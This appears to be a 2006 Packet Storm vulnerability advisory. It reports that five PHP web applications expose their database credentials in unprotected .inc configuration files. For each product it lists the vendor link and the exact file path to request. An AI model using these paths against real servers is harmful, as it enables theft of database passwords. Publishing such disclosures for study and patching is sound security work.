MP3netbox Beta 1, efone versions 20000723 and below, Kamikaze-QSCM versions 0.1 and below, Blueboy versions 1.0.3 and below, and Foros version 1.0 all suffer from a remote database password disclosure flaw.
dc8c9d2705236f6224e0b21c925925c51b2bab989064fb50dcf9016603f57796#
# Title: 5 php scripts remote database password disclosure
# Date: Sun July 02 21:04 2006
# Credits: Security hole discovered by DarkFig (gmdarkfig@gmail.com)
# Problem: Database configuration is located in a .inc file(no protected by .htaccess file)
# Web: http://acid-root.new.fr
#
# VulnScr: Mp3netbox Beta 1
# Author: flymoon@users.sourceforge.net
# Download: http://sourceforge.net/projects/mp3netbox
# Exploit: http://[...]/config.inc
# VulnScr: efone <= 20000723
# Author: brush@users.sourceforge.net
# Download: http://sourceforge.net/projects/efone
# Exploit: http://[...]/config.inc
# VulnScr: Kamikaze-QSCM <= v0.1
# Author: ???@????.???
# Download: http://kamikaze-qscm.tigris.org/
# Exploit: http://[...]/config.inc
# VulnScr: Blueboy <= 1.0.3
# Author: mano@users.sourceforge.net
# Download: http://sourceforge.net/projects/bb-news
# Exploit: http://[...]/bb_news_config.inc
# VulnScr: Foros V.1.0
# Author: eupla@users.sourceforge.net
# Download: http://sourceforge.net/project/showfiles.php?group_id=14333&package_id=51342
# Exploit: http://[...]/inc/config.inc
#EOF
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed